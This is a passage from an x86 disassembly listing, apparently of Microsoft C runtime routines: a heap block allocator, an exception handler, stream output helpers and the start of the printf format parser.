inc eax
loc_4062F4: ; CODE XREF: sub_40601A+19D�j
pop edi
pop esi
pop ebx
leave
retn
sub_40601A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4062F9 proc near ; CODE XREF: sub_403691+28�p
; sub_40D94F+88�p ...
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
mov eax, dword_434DDC
mov ecx, [ebp+arg_0]
imul eax, 14h
add eax, dword_434DE0
add ecx, 17h
and ecx, 0FFFFFFF0h
mov [ebp+var_10], ecx
sar ecx, 4
push ebx
dec ecx
cmp ecx, 20h
push esi
push edi
jge short loc_406330
or esi, 0FFFFFFFFh
shr esi, cl
or [ebp+var_8], 0FFFFFFFFh
jmp short loc_40633D
; ---------------------------------------------------------------------------
loc_406330: ; CODE XREF: sub_4062F9+2A�j
add ecx, 0FFFFFFE0h
or edx, 0FFFFFFFFh
xor esi, esi
shr edx, cl
mov [ebp+var_8], edx
loc_40633D: ; CODE XREF: sub_4062F9+35�j
mov ecx, dword_434DE8
mov ebx, ecx
jmp short loc_406358
; ---------------------------------------------------------------------------
loc_406347: ; CODE XREF: sub_4062F9+64�j
mov edx, [ebx+4]
mov edi, [ebx]
and edx, [ebp+var_8]
and edi, esi
or edx, edi
jnz short loc_40635F
add ebx, 14h
loc_406358: ; CODE XREF: sub_4062F9+4C�j
cmp ebx, eax
mov [ebp+arg_0], ebx
jb short loc_406347
loc_40635F: ; CODE XREF: sub_4062F9+5A�j
cmp ebx, eax
jnz short loc_4063E2
mov ebx, dword_434DE0
jmp short loc_40637C
; ---------------------------------------------------------------------------
loc_40636B: ; CODE XREF: sub_4062F9+88�j
mov edx, [ebx+4]
mov edi, [ebx]
and edx, [ebp+var_8]
and edi, esi
or edx, edi
jnz short loc_406383
add ebx, 14h
loc_40637C: ; CODE XREF: sub_4062F9+70�j
cmp ebx, ecx
mov [ebp+arg_0], ebx
jb short loc_40636B
loc_406383: ; CODE XREF: sub_4062F9+7E�j
cmp ebx, ecx
jnz short loc_4063E2
jmp short loc_406395
; ---------------------------------------------------------------------------
loc_406389: ; CODE XREF: sub_4062F9+9E�j
cmp dword ptr [ebx+8], 0
jnz short loc_406399
add ebx, 14h
mov [ebp+arg_0], ebx
loc_406395: ; CODE XREF: sub_4062F9+8E�j
cmp ebx, eax
jb short loc_406389
loc_406399: ; CODE XREF: sub_4062F9+94�j
cmp ebx, eax
jnz short loc_4063CE
mov ebx, dword_434DE0
jmp short loc_4063AE
; ---------------------------------------------------------------------------
loc_4063A5: ; CODE XREF: sub_4062F9+BA�j
cmp dword ptr [ebx+8], 0
jnz short loc_4063B5
add ebx, 14h
loc_4063AE: ; CODE XREF: sub_4062F9+AA�j
cmp ebx, ecx
mov [ebp+arg_0], ebx
jb short loc_4063A5
loc_4063B5: ; CODE XREF: sub_4062F9+B0�j
cmp ebx, ecx
jnz short loc_4063CE
call sub_405E64
mov ebx, eax
test ebx, ebx
mov [ebp+arg_0], ebx
jnz short loc_4063CE
loc_4063C7: ; CODE XREF: sub_4062F9+E7�j
xor eax, eax
jmp loc_4065D7
; ---------------------------------------------------------------------------
loc_4063CE: ; CODE XREF: sub_4062F9+A2�j
; sub_4062F9+BE�j ...
push ebx
call sub_405F14
pop ecx
mov ecx, [ebx+10h]
mov [ecx], eax
mov eax, [ebx+10h]
cmp dword ptr [eax], 0FFFFFFFFh
jz short loc_4063C7
loc_4063E2: ; CODE XREF: sub_4062F9+68�j
; sub_4062F9+8C�j
mov dword_434DE8, ebx
mov eax, [ebx+10h]
mov edx, [eax]
cmp edx, 0FFFFFFFFh
mov [ebp+var_4], edx
jz short loc_406409
mov ecx, [eax+edx*4+0C4h]
mov edi, [eax+edx*4+44h]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_406432
loc_406409: ; CODE XREF: sub_4062F9+FA�j
and [ebp+var_4], 0
mov edx, [eax+0C4h]
lea ecx, [eax+44h]
loc_406416: ; CODE XREF: sub_4062F9+134�j
mov edi, [ecx]
and edx, [ebp+var_8]
and edi, esi
or edx, edi
jnz short loc_40642F
inc [ebp+var_4]
mov edx, [ecx+84h]
add ecx, 4
jmp short loc_406416
; ---------------------------------------------------------------------------
loc_40642F: ; CODE XREF: sub_4062F9+126�j
mov edx, [ebp+var_4]
loc_406432: ; CODE XREF: sub_4062F9+10E�j
mov ecx, edx
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_C], ecx
mov ecx, [eax+edx*4+44h]
xor edi, edi
and ecx, esi
jnz short loc_406460
mov ecx, [eax+edx*4+0C4h]
and ecx, [ebp+var_8]
push 20h
pop edi
jmp short loc_406460
; ---------------------------------------------------------------------------
loc_40645D: ; CODE XREF: sub_4062F9+169�j
add ecx, ecx
inc edi
loc_406460: ; CODE XREF: sub_4062F9+153�j
; sub_4062F9+162�j
test ecx, ecx
jge short loc_40645D
mov ecx, [ebp+var_C]
mov edx, [ecx+edi*8+4]
mov ecx, [edx]
sub ecx, [ebp+var_10]
mov esi, ecx
sar esi, 4
dec esi
cmp esi, 3Fh
mov [ebp+var_8], ecx
jle short loc_406481
push 3Fh
pop esi
loc_406481: ; CODE XREF: sub_4062F9+183�j
cmp esi, edi
jz loc_40658A
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_4064ED
cmp edi, 20h
mov ebx, 80000000h
jge short loc_4064C1
mov ecx, edi
shr ebx, cl
mov ecx, [ebp+var_4]
lea edi, [eax+edi+4]
not ebx
mov [ebp+var_14], ebx
and ebx, [eax+ecx*4+44h]
mov [eax+ecx*4+44h], ebx
dec byte ptr [edi]
jnz short loc_4064EA
mov ecx, [ebp+var_14]
mov ebx, [ebp+arg_0]
and [ebx], ecx
jmp short loc_4064ED
; ---------------------------------------------------------------------------
loc_4064C1: ; CODE XREF: sub_4062F9+1A0�j
lea ecx, [edi-20h]
shr ebx, cl
mov ecx, [ebp+var_4]
lea ecx, [eax+ecx*4+0C4h]
lea edi, [eax+edi+4]
not ebx
and [ecx], ebx
dec byte ptr [edi]
mov [ebp+var_14], ebx
jnz short loc_4064EA
mov ebx, [ebp+arg_0]
mov ecx, [ebp+var_14]
and [ebx+4], ecx
jmp short loc_4064ED
; ---------------------------------------------------------------------------
loc_4064EA: ; CODE XREF: sub_4062F9+1BC�j
; sub_4062F9+1E4�j
mov ebx, [ebp+arg_0]
loc_4064ED: ; CODE XREF: sub_4062F9+196�j
; sub_4062F9+1C6�j ...
cmp [ebp+var_8], 0
mov ecx, [edx+8]
mov edi, [edx+4]
mov [ecx+4], edi
mov ecx, [edx+4]
mov edi, [edx+8]
mov [ecx+8], edi
jz loc_406596
mov ecx, [ebp+var_C]
lea ecx, [ecx+esi*8]
mov edi, [ecx+4]
mov [edx+8], ecx
mov [edx+4], edi
mov [ecx+4], edx
mov ecx, [edx+4]
mov [ecx+8], edx
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_406587
mov cl, [esi+eax+4]
mov byte ptr [ebp+arg_0+3], cl
inc cl
cmp esi, 20h
mov [esi+eax+4], cl
jge short loc_40655E
cmp byte ptr [ebp+arg_0+3], 0
jnz short loc_40654C
mov edi, 80000000h
mov ecx, esi
shr edi, cl
or [ebx], edi
loc_40654C: ; CODE XREF: sub_4062F9+246�j
mov ecx, esi
mov edi, 80000000h
shr edi, cl
mov ecx, [ebp+var_4]
or [eax+ecx*4+44h], edi
jmp short loc_406587
; ---------------------------------------------------------------------------
loc_40655E: ; CODE XREF: sub_4062F9+240�j
cmp byte ptr [ebp+arg_0+3], 0
jnz short loc_406571
lea ecx, [esi-20h]
mov edi, 80000000h
shr edi, cl
or [ebx+4], edi
loc_406571: ; CODE XREF: sub_4062F9+269�j
mov ecx, [ebp+var_4]
lea edi, [eax+ecx*4+0C4h]
lea ecx, [esi-20h]
mov esi, 80000000h
shr esi, cl
or [edi], esi
loc_406587: ; CODE XREF: sub_4062F9+22E�j
; sub_4062F9+263�j
mov ecx, [ebp+var_8]
loc_40658A: ; CODE XREF: sub_4062F9+18A�j
test ecx, ecx
jz short loc_406599
mov [edx], ecx
mov [ecx+edx-4], ecx
jmp short loc_406599
; ---------------------------------------------------------------------------
loc_406596: ; CODE XREF: sub_4062F9+20A�j
mov ecx, [ebp+var_8]
loc_406599: ; CODE XREF: sub_4062F9+293�j
; sub_4062F9+29B�j
mov esi, [ebp+var_10]
add edx, ecx
lea ecx, [esi+1]
mov [edx], ecx
mov [edx+esi-4], ecx
mov esi, [ebp+var_C]
mov ecx, [esi]
test ecx, ecx
lea edi, [ecx+1]
mov [esi], edi
jnz short loc_4065CF
cmp ebx, dword_425F6C
jnz short loc_4065CF
mov ecx, [ebp+var_4]
cmp ecx, dword_434DF0
jnz short loc_4065CF
and dword_425F6C, 0
loc_4065CF: ; CODE XREF: sub_4062F9+2BA�j
; sub_4062F9+2C2�j ...
mov ecx, [ebp+var_4]
mov [eax], ecx
lea eax, [edx+4]
loc_4065D7: ; CODE XREF: sub_4062F9+D0�j
pop edi
pop esi
pop ebx
leave
retn
sub_4062F9 endp
; [00000045 BYTES: COLLAPSED FUNCTION __SEH_prolog4. PRESS KEYPAD "+" TO EXPAND]
; [00000014 BYTES: COLLAPSED FUNCTION __SEH_epilog4. PRESS KEYPAD "+" TO EXPAND]
align 10h
; =============== S U B R O U T I N E =======================================
sub_406640 proc near ; DATA XREF: __SEH_prolog4�o
var_11 = byte ptr -11h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
; FUNCTION CHUNK AT 004086D1 SIZE 00000019 BYTES
sub esp, 14h
push ebx
mov ebx, [esp+18h+arg_4]
push ebp
push esi
mov esi, [ebx+8]
xor esi, dword_423064
push edi
mov eax, [esi]
cmp eax, 0FFFFFFFEh
mov [esp+24h+var_11], 0
mov [esp+24h+var_C], 1
lea edi, [ebx+10h]
jz short loc_406678
mov ecx, [esi+4]
add ecx, edi
xor ecx, [eax+edi]
call sub_402710
loc_406678: ; CODE XREF: sub_406640+29�j
mov ecx, [esi+0Ch]
mov eax, [esi+8]
add ecx, edi
xor ecx, [eax+edi]
call sub_402710
mov eax, [esp+24h+arg_0]
test byte ptr [eax+4], 66h
jnz loc_4067B5
mov ebp, [ebx+0Ch]
cmp ebp, 0FFFFFFFEh
mov ecx, [esp+24h+arg_8]
lea edx, [esp+24h+var_8]
mov [esp+24h+var_8], eax
mov [esp+24h+var_4], ecx
mov [ebx-4], edx
jz short loc_40670F
loc_4066B1: ; CODE XREF: sub_406640+A2�j
lea eax, [ebp+ebp*2+0]
mov ecx, [esi+eax*4+14h]
test ecx, ecx
lea ebx, [esi+eax*4+10h]
mov eax, [ebx]
mov [esp+24h+var_10], eax
jz short loc_4066DD
mov edx, edi
call sub_4086BA
test eax, eax
mov [esp+24h+var_11], 1
jl short loc_40671B
jg short loc_406725
mov eax, [esp+24h+var_10]
loc_4066DD: ; CODE XREF: sub_406640+85�j
cmp eax, 0FFFFFFFEh
mov ebp, eax
jnz short loc_4066B1
cmp [esp+24h+var_11], 0
jz short loc_40670F
loc_4066EB: ; CODE XREF: sub_406640+E3�j
; sub_406640+191�j
mov eax, [esi]
cmp eax, 0FFFFFFFEh
jz short loc_4066FF
mov ecx, [esi+4]
add ecx, edi
xor ecx, [eax+edi]
call sub_402710
loc_4066FF: ; CODE XREF: sub_406640+B0�j
mov ecx, [esi+0Ch]
mov eax, [esi+8]
add ecx, edi
xor ecx, [eax+edi]
call sub_402710
loc_40670F: ; CODE XREF: sub_406640+6F�j
; sub_406640+A9�j ...
mov eax, [esp+24h+var_C]
pop edi
pop esi
pop ebp
pop ebx
add esp, 14h
retn
; ---------------------------------------------------------------------------
loc_40671B: ; CODE XREF: sub_406640+95�j
mov [esp+24h+var_C], 0
jmp short loc_4066EB
; ---------------------------------------------------------------------------
loc_406725: ; CODE XREF: sub_406640+97�j
mov ecx, [esp+24h+arg_0]
cmp dword ptr [ecx], 0E06D7363h
jnz short loc_40675B
cmp ds:off_41DC1C, 0
jz short loc_40675B
push offset off_41DC1C
call sub_40CC52
add esp, 4
test eax, eax
jz short loc_40675B
mov edx, [esp+24h+arg_0]
push 1
push edx
call ds:off_41DC1C
add esp, 8
loc_40675B: ; CODE XREF: sub_406640+EF�j
; sub_406640+F8�j ...
mov ecx, [esp+24h+arg_4]
call sub_4086EA
mov eax, [esp+24h+arg_4]
cmp [eax+0Ch], ebp
jz short loc_406780
push offset dword_423064
push edi
mov edx, ebp
mov ecx, eax
call sub_408704
mov eax, [esp+24h+arg_4]
loc_406780: ; CODE XREF: sub_406640+12B�j
mov ecx, [esp+24h+var_10]
mov [eax+0Ch], ecx
mov eax, [esi]
cmp eax, 0FFFFFFFEh
jz short loc_40679B
mov ecx, [esi+4]
add ecx, edi
xor ecx, [eax+edi]
call sub_402710
loc_40679B: ; CODE XREF: sub_406640+14C�j
mov ecx, [esi+0Ch]
mov edx, [esi+8]
add ecx, edi
xor ecx, [edx+edi]
call sub_402710
mov ecx, [ebx+8]
mov edx, edi
jmp loc_4086D1
; ---------------------------------------------------------------------------
loc_4067B5: ; CODE XREF: sub_406640+50�j
cmp dword ptr [ebx+0Ch], 0FFFFFFFEh
jz loc_40670F
push offset dword_423064
push edi
mov ecx, ebx
mov edx, 0FFFFFFFEh
call sub_408704
jmp loc_4066EB
sub_406640 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4067D6 proc near ; CODE XREF: sub_402AEE+9F�p
; sub_4030B5+6E�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push esi
mov esi, [ebp+arg_4]
push esi
call sub_408A20
mov [ebp+arg_4], eax
mov eax, [esi+0Ch]
test al, 82h
pop ecx
jnz short loc_406806
call sub_4057D3
mov dword ptr [eax], 9
loc_4067FA: ; CODE XREF: sub_4067D6+3F�j
or dword ptr [esi+0Ch], 20h
or eax, 0FFFFFFFFh
jmp loc_406933
; ---------------------------------------------------------------------------
loc_406806: ; CODE XREF: sub_4067D6+17�j
test al, 40h
jz short loc_406817
call sub_4057D3
mov dword ptr [eax], 22h
jmp short loc_4067FA
; ---------------------------------------------------------------------------
loc_406817: ; CODE XREF: sub_4067D6+32�j
push ebx
xor ebx, ebx
test al, 1
jz short loc_406834
test al, 10h
mov [esi+4], ebx
jz loc_4068AE
mov ecx, [esi+8]
and eax, 0FFFFFFFEh
mov [esi], ecx
mov [esi+0Ch], eax
loc_406834: ; CODE XREF: sub_4067D6+46�j
mov eax, [esi+0Ch]
and eax, 0FFFFFFEFh
or eax, 2
test ax, 10Ch
mov [esi+0Ch], eax
mov [esi+4], ebx
mov [ebp+var_4], ebx
jnz short loc_406878
call sub_408084
add eax, 20h
cmp esi, eax
jz short loc_406864
call sub_408084
add eax, 40h
cmp esi, eax
jnz short loc_406871
loc_406864: ; CODE XREF: sub_4067D6+80�j
push [ebp+arg_4]
call sub_40D540
test eax, eax
pop ecx
jnz short loc_406878
loc_406871: ; CODE XREF: sub_4067D6+8C�j
push esi
call sub_40D4FC
pop ecx
loc_406878: ; CODE XREF: sub_4067D6+74�j
; sub_4067D6+99�j
test word ptr [esi+0Ch], 108h
push edi
jz loc_406905
mov eax, [esi+8]
mov edi, [esi]
lea ecx, [eax+1]
mov [esi], ecx
mov ecx, [esi+18h]
sub edi, eax
dec ecx
cmp edi, ebx
mov [esi+4], ecx
jle short loc_4068B9
push edi
push eax
push [ebp+arg_4]
call sub_40D420
add esp, 0Ch
mov [ebp+var_4], eax
jmp short loc_4068FB
; ---------------------------------------------------------------------------
loc_4068AE: ; CODE XREF: sub_4067D6+4D�j
or eax, 20h
mov [esi+0Ch], eax
or eax, 0FFFFFFFFh
jmp short loc_406932
; ---------------------------------------------------------------------------
loc_4068B9: ; CODE XREF: sub_4067D6+C4�j
mov ecx, [ebp+arg_4]
cmp ecx, 0FFFFFFFFh
jz short loc_4068DC
cmp ecx, 0FFFFFFFEh
jz short loc_4068DC
mov eax, ecx
and eax, 1Fh
imul eax, 28h
mov edx, ecx
sar edx, 5
add eax, dword_433CA0[edx*4]
jmp short loc_4068E1
; ---------------------------------------------------------------------------
loc_4068DC: ; CODE XREF: sub_4067D6+E9�j
; sub_4067D6+EE�j
mov eax, offset dword_423BD0
loc_4068E1: ; CODE XREF: sub_4067D6+104�j
test byte ptr [eax+4], 20h
jz short loc_4068FB
push 2
push ebx
push ebx
push ecx
call sub_40CD41
and eax, edx
add esp, 10h
cmp eax, 0FFFFFFFFh
jz short loc_406920
loc_4068FB: ; CODE XREF: sub_4067D6+D6�j
; sub_4067D6+10F�j
mov eax, [esi+8]
mov cl, byte ptr [ebp+arg_0]
mov [eax], cl
jmp short loc_40691B
; ---------------------------------------------------------------------------
loc_406905: ; CODE XREF: sub_4067D6+A9�j
xor edi, edi
inc edi
push edi
lea eax, [ebp+arg_0]
push eax
push [ebp+arg_4]
call sub_40D420
add esp, 0Ch
mov [ebp+var_4], eax
loc_40691B: ; CODE XREF: sub_4067D6+12D�j
cmp [ebp+var_4], edi
jz short loc_406929
loc_406920: ; CODE XREF: sub_4067D6+123�j
or dword ptr [esi+0Ch], 20h
or eax, 0FFFFFFFFh
jmp short loc_406931
; ---------------------------------------------------------------------------
loc_406929: ; CODE XREF: sub_4067D6+148�j
mov eax, [ebp+arg_0]
and eax, 0FFh
loc_406931: ; CODE XREF: sub_4067D6+151�j
pop edi
loc_406932: ; CODE XREF: sub_4067D6+E1�j
pop ebx
loc_406933: ; CODE XREF: sub_4067D6+2B�j
pop esi
leave
retn
sub_4067D6 endp
; =============== S U B R O U T I N E =======================================
sub_406936 proc near ; CODE XREF: sub_406969+11�p
; sub_40698D+22�p ...
test byte ptr [ecx+0Ch], 40h
jz short loc_406942
cmp dword ptr [ecx+8], 0
jz short loc_406966
loc_406942: ; CODE XREF: sub_406936+4�j
dec dword ptr [ecx+4]
js short loc_406952
mov edx, [ecx]
mov [edx], al
inc dword ptr [ecx]
movzx eax, al
jmp short loc_40695E
; ---------------------------------------------------------------------------
loc_406952: ; CODE XREF: sub_406936+F�j
movsx eax, al
push ecx
push eax
call sub_4067D6
pop ecx
pop ecx
loc_40695E: ; CODE XREF: sub_406936+1A�j
cmp eax, 0FFFFFFFFh
jnz short loc_406966
or [esi], eax
retn
; ---------------------------------------------------------------------------
loc_406966: ; CODE XREF: sub_406936+A�j
; sub_406936+2B�j
inc dword ptr [esi]
retn
sub_406936 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406969 proc near ; CODE XREF: sub_4069D7+853�p
; sub_4069D7+880�p ...
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push esi
mov esi, eax
jmp short loc_406984
; ---------------------------------------------------------------------------
loc_406971: ; CODE XREF: sub_406969+1F�j
mov ecx, [ebp+arg_8]
mov al, [ebp+arg_0]
dec [ebp+arg_4]
call sub_406936
cmp dword ptr [esi], 0FFFFFFFFh
jz short loc_40698A
loc_406984: ; CODE XREF: sub_406969+6�j
cmp [ebp+arg_4], 0
jg short loc_406971
loc_40698A: ; CODE XREF: sub_406969+19�j
pop esi
pop ebp
retn
sub_406969 endp
; =============== S U B R O U T I N E =======================================
sub_40698D proc near ; CODE XREF: sub_4069D7+867�p
; sub_4069D7+8CE�p ...
arg_0 = dword ptr 4
test byte ptr [edi+0Ch], 40h
push ebx
push esi
mov esi, eax
mov ebx, ecx
jz short loc_4069CD
cmp dword ptr [edi+8], 0
jnz short loc_4069CD
mov eax, [esp+8+arg_0]
add [esi], eax
jmp short loc_4069D4
; ---------------------------------------------------------------------------
loc_4069A7: ; CODE XREF: sub_40698D+45�j
mov al, [ebx]
dec [esp+8+arg_0]
mov ecx, edi
call sub_406936
inc ebx
cmp dword ptr [esi], 0FFFFFFFFh
jnz short loc_4069CD
call sub_4057D3
cmp dword ptr [eax], 2Ah
jnz short loc_4069D4
mov ecx, edi
mov al, 3Fh
call sub_406936
loc_4069CD: ; CODE XREF: sub_40698D+A�j
; sub_40698D+10�j ...
cmp [esp+8+arg_0], 0
jg short loc_4069A7
loc_4069D4: ; CODE XREF: sub_40698D+18�j
; sub_40698D+35�j
pop esi
pop ebx
retn
sub_40698D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=1F8h
sub_4069D7 proc near ; CODE XREF: sub_402AEE+80�p
; sub_4030B5+53�p ...
var_278 = dword ptr -278h
var_274 = dword ptr -274h
var_270 = dword ptr -270h
var_26C = dword ptr -26Ch
var_268 = dword ptr -268h
var_260 = dword ptr -260h
var_25C = byte ptr -25Ch
var_254 = dword ptr -254h
var_250 = byte ptr -250h
var_24C = dword ptr -24Ch
var_248 = dword ptr -248h
var_244 = dword ptr -244h
var_240 = dword ptr -240h
var_23C = dword ptr -23Ch
var_238 = dword ptr -238h
var_234 = dword ptr -234h
var_230 = byte ptr -230h
var_22F = byte ptr -22Fh
var_22C = dword ptr -22Ch
var_228 = dword ptr -228h
var_224 = dword ptr -224h
var_220 = dword ptr -220h
var_21C = dword ptr -21Ch
var_218 = dword ptr -218h
var_211 = byte ptr -211h
var_210 = dword ptr -210h
var_20C = byte ptr -20Ch
var_D = byte ptr -0Dh
var_C = byte ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
lea ebp, [esp-1F8h]
sub esp, 278h
mov eax, dword_423064
xor eax, ebp
mov [ebp+1F8h+var_4], eax
mov eax, [ebp+1F8h+arg_0]
push ebx
mov ebx, [ebp+1F8h+arg_4]
push esi
xor esi, esi
push edi
mov edi, [ebp+1F8h+arg_C]
push [ebp+1F8h+arg_8]
lea ecx, [ebp+1F8h+var_25C]
mov [ebp+1F8h+var_228], eax
mov [ebp+1F8h+var_224], edi
mov [ebp+1F8h+var_244], esi
mov [ebp+1F8h+var_210], esi
mov [ebp+1F8h+var_238], esi
mov [ebp+1F8h+var_218], esi
mov [ebp+1F8h+var_234], esi
mov [ebp+1F8h+var_248], esi
mov [ebp+1F8h+var_23C], esi
call sub_40271F
cmp [ebp+1F8h+var_228], esi
jnz short loc_406A64
loc_406A37: ; CODE XREF: sub_4069D7+E5�j
; sub_4069D7+138�j ...
call sub_4057D3
push esi
push esi
push esi
push esi
mov dword ptr [eax], 16h
push esi
loc_406A47: ; CODE XREF: sub_4069D7+948�j
call sub_402F39
add esp, 14h
cmp [ebp+1F8h+var_250], 0
jz short loc_406A5C
mov eax, [ebp+1F8h+var_254]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_406A5C: ; CODE XREF: sub_4069D7+7C�j
or eax, 0FFFFFFFFh
jmp loc_407334
; ---------------------------------------------------------------------------
loc_406A64: ; CODE XREF: sub_4069D7+5E�j
mov eax, [ebp+1F8h+var_228]
test byte ptr [eax+0Ch], 40h
jnz loc_406B15
push eax
call sub_408A20
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_406AB3
push [ebp+1F8h+var_228]
call sub_408A20
cmp eax, 0FFFFFFFEh
pop ecx
jz short loc_406AB3
push [ebp+1F8h+var_228]
call sub_408A20
push [ebp+1F8h+var_228]
sar eax, 5
lea esi, ds:433CA0h[eax*4]
call sub_408A20
and eax, 1Fh
imul eax, 28h
add eax, [esi]
pop ecx
pop ecx
xor esi, esi
jmp short loc_406AB8
; ---------------------------------------------------------------------------
loc_406AB3: ; CODE XREF: sub_4069D7+A4�j
; sub_4069D7+B2�j
mov eax, offset dword_423BD0
loc_406AB8: ; CODE XREF: sub_4069D7+DA�j
test byte ptr [eax+24h], 7Fh
jnz loc_406A37
push [ebp+1F8h+var_228]
call sub_408A20
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_406B06
push [ebp+1F8h+var_228]
call sub_408A20
cmp eax, 0FFFFFFFEh
pop ecx
jz short loc_406B06
push [ebp+1F8h+var_228]
call sub_408A20
push [ebp+1F8h+var_228]
sar eax, 5
lea esi, ds:433CA0h[eax*4]
call sub_408A20
and eax, 1Fh
imul eax, 28h
add eax, [esi]
pop ecx
pop ecx
xor esi, esi
jmp short loc_406B0B
; ---------------------------------------------------------------------------
loc_406B06: ; CODE XREF: sub_4069D7+F7�j
; sub_4069D7+105�j
mov eax, offset dword_423BD0
loc_406B0B: ; CODE XREF: sub_4069D7+12D�j
test byte ptr [eax+24h], 80h
jnz loc_406A37
loc_406B15: ; CODE XREF: sub_4069D7+94�j
cmp ebx, esi
jz loc_406A37
mov dl, [ebx]
xor ecx, ecx
test dl, dl
mov [ebp+1F8h+var_22C], esi
mov [ebp+1F8h+var_220], esi
mov [ebp+1F8h+var_24C], esi
mov [ebp+1F8h+var_211], dl
jz loc_407324
loc_406B35: ; CODE XREF: sub_4069D7+931�j
inc ebx
cmp [ebp+1F8h+var_22C], 0
mov [ebp+1F8h+var_240], ebx
jl loc_407324
mov al, dl
sub al, 20h
cmp al, 58h
ja short loc_406B5C
movsx eax, dl
movzx eax, ds:byte_41D4D8[eax]
and eax, 0Fh
xor esi, esi
jmp short loc_406B60
; ---------------------------------------------------------------------------
loc_406B5C: ; CODE XREF: sub_4069D7+172�j
xor esi, esi
xor eax, eax
loc_406B60: ; CODE XREF: sub_4069D7+183�j
movsx eax, ds:byte_41D4F8[ecx+eax*8]
push 7
sar eax, 4
pop ecx
cmp eax, ecx ; switch 8 cases
mov [ebp+1F8h+var_26C], eax
ja loc_4072F4 ; default
jmp ds:off_40734F[eax*4] ; switch jump
loc_406B80: ; DATA XREF: .text:off_40734F�o
or [ebp+1F8h+var_218], 0FFFFFFFFh ; jumptable 00406B79 case 1
mov [ebp+1F8h+var_270], esi
mov [ebp+1F8h+var_248], esi
mov [ebp+1F8h+var_238], esi
mov [ebp+1F8h+var_234], esi
mov [ebp+1F8h+var_210], esi
mov [ebp+1F8h+var_23C], esi
jmp loc_4072F4 ; default
; ---------------------------------------------------------------------------
loc_406B9B: ; CODE XREF: sub_4069D7+1A2�j
; DATA XREF: .text:off_40734F�o
movsx eax, dl ; jumptable 00406B79 case 2
sub eax, 20h
jz short loc_406BE1
sub eax, 3
jz short loc_406BD5
sub eax, 8
jz short loc_406BCC
dec eax
dec eax
jz short loc_406BC3
sub eax, 3
jnz loc_4072F4 ; default
or [ebp+1F8h+var_210], 8
jmp loc_4072F4 ; default
; ---------------------------------------------------------------------------
loc_406BC3: ; CODE XREF: sub_4069D7+1D8�j
or [ebp+1F8h+var_210], 4
jmp loc_4072F4 ; default
; ---------------------------------------------------------------------------
loc_406BCC: ; CODE XREF: sub_4069D7+1D4�j
or [ebp+1F8h+var_210], 1
jmp loc_4072F4 ; default
; ---------------------------------------------------------------------------
loc_406BD5: ; CODE XREF: sub_4069D7+1CF�j
or [ebp+1F8h+var_210], 80h
jmp loc_4072F4 ; default
; ---------------------------------------------------------------------------
loc_406BE1: ; CODE XREF: sub_4069D7+1CA�j
or [ebp+1F8h+var_210], 2
jmp loc_4072F4 ; default
; ---------------------------------------------------------------------------
loc_406BEA: ; CODE XREF: sub_4069D7+1A2�j
; DATA XREF: .text:off_40734F�o
cmp dl, 2Ah ; jumptable 00406B79 case 3
jnz short loc_406C0F
add edi, 4
mov [ebp+1F8h+var_224], edi
mov edi, [edi-4]
cmp edi, esi
mov [ebp+1F8h+var_238], edi
jge loc_4072F4 ; default
or [ebp+1F8h+var_210], 4
neg [ebp+1F8h+var_238]
jmp loc_4072F4 ; default
; ---------------------------------------------------------------------------
loc_406C0F: ; CODE XREF: sub_4069D7+216�j
mov eax, [ebp+1F8h+var_238]
imul eax, 0Ah
movsx ecx, dl
lea eax, [eax+ecx-30h]
mov [ebp+1F8h+var_238], eax
jmp loc_4072F4 ; default
; ---------------------------------------------------------------------------
loc_406C24: ; CODE XREF: sub_4069D7+1A2�j
; DATA XREF: .text:off_40734F�o
mov [ebp+1F8h+var_218], esi ; jumptable 00406B79 case 4
jmp loc_4072F4 ; default
; ---------------------------------------------------------------------------
loc_406C2C: ; CODE XREF: sub_4069D7+1A2�j
; DATA XREF: .text:off_40734F�o
cmp dl, 2Ah ; jumptable 00406B79 case 5
jnz short loc_406C4E
add edi, 4
mov [ebp+1F8h+var_224], edi
mov edi, [edi-4]
cmp edi, esi
mov [ebp+1F8h+var_218], edi
jge loc_4072F4 ; default
or [ebp+1F8h+var_218], 0FFFFFFFFh
jmp loc_4072F4 ; default
; ---------------------------------------------------------------------------
loc_406C4E: ; CODE XREF: sub_4069D7+258�j
mov eax, [ebp+1F8h+var_218]
imul eax, 0Ah
movsx ecx, dl
lea eax, [eax+ecx-30h]
mov [ebp+1F8h+var_218], eax
jmp loc_4072F4 ; default
; ---------------------------------------------------------------------------
loc_406C63: ; CODE XREF: sub_4069D7+1A2�j
; DATA XREF: .text:off_40734F�o
cmp dl, 49h ; jumptable 00406B79 case 6
jz short loc_406CAE
cmp dl, 68h
jz short loc_406CA5
cmp dl, 6Ch
jz short loc_406C87
cmp dl, 77h
jnz loc_4072F4 ; default
or [ebp+1F8h+var_210], 800h
jmp loc_4072F4 ; default
; ---------------------------------------------------------------------------
loc_406C87: ; CODE XREF: sub_4069D7+299�j
cmp byte ptr [ebx], 6Ch
jnz short loc_406C9C
inc ebx
or [ebp+1F8h+var_210], 1000h
mov [ebp+1F8h+var_240], ebx
jmp loc_4072F4 ; default
; ---------------------------------------------------------------------------
loc_406C9C: ; CODE XREF: sub_4069D7+2B3�j
